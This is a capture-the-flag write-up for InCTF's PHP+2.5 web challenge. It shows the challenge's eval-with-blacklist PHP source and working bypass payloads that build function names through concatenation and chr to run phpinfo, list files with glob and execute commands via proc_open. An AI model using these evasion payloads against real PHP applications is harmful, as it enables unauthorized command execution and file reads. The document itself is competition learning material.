I played InCTF as a member of zer0pts
. We reached 22nd place and got 2302 points. It was a very good CTF. Thanks all the admins for holding such a great competition!
I solved PHP+1.5
and PHP+2.5
during the competition. Write it up.
[Web 744points] PHP+2.5
The given url evaluated our PHP code. There were some restrictions: our code couldn't include any defined function names, specific symbols and language constructs, and its length should be shorter than 100 bytes. In details, see the following script.
<?php $input = $_GET['input']; function check(){ global $input; foreach (get_defined_functions()['internal'] as $blacklisted) { if (preg_match ('/' . $blacklisted . '/im', $input)) { echo "Your input is blacklisted" . "<br>"; return true; break; } } $blacklist = "exit|die|eval|\[|\]|\\\|\*|`|-|\+|~|\{|\}|\"|\'"; if(preg_match("/$blacklist/i", $input)){ echo "Do you really you need that?" . "<br>"; return true; } unset($blacklist); if(strlen($input)>100){ #That is random no. I took ;) echo "This is getting really large input..." . "<br>"; return true; } return false; } $thisfille=$_GET['thisfile']; if(is_file($thisfille)){ echo "You can't use inner file" . "<br>"; } else{ if(file_exists($thisfille)){ if(check()){ echo "Naaah" . "<br>"; }else{ eval($input); } }else{ echo "File doesn't exist" . "<br>"; } } function iterate($ass){ foreach($ass as $hole){ echo "AssHole"; } } highlight_file(__FILE__); ?>
At first, I saw the phpinfo with the this payload: ?thisfile=/&input=$x=php.info;$x();
. Because PHP assumes an undefined identifier as a string and supports variable functions, this payload calls phpinfo()
.
By the phpinfo, I found that some functions that execute commands and read from and write to files were disabled. However, proc_open
and file
were still enabled. So we might execute arbitrary commands and read arbitrary files.
When I was globbing the root directory (payload is /?thisfile=/&input=$x=ch.r;$d=va.$x(114).$x(95).dump;$g=glo.b;$d($g($x(47).$x(42)));
, there was a /readFile
executable. We should execute this one.
I used chr
, proc_open
, hex2bin
, file
, and var_dump
to get the flag. After executing /readFile>/tmp/x
by proc_open
, then read it by file
and output by var_dump
. My payloads are here.
- do
proc_open("/r*>/tmp/x",[],$z);
:?thisfile=/&input=$x=c.hr;$f=proc.$x(95).open;$g=hex.$x(50).bin;$f($g($x(50).f722a3e2f746d702f78),array(),$z);
- do
var_dump(file("/tmp/x"));
:?thisfile=/&input=$x=c.hr;$f=va.$x(114).$x(95).dump;$g=fil.e;$a=$x(47).tmp.$x(47).x;$f($g($a));
Got the result! FLAG: inctf{Getting_segmentation_fault is_fun}
Unintended solution :P
[Web 100points] PHP+1.5
Same as PHP+2.5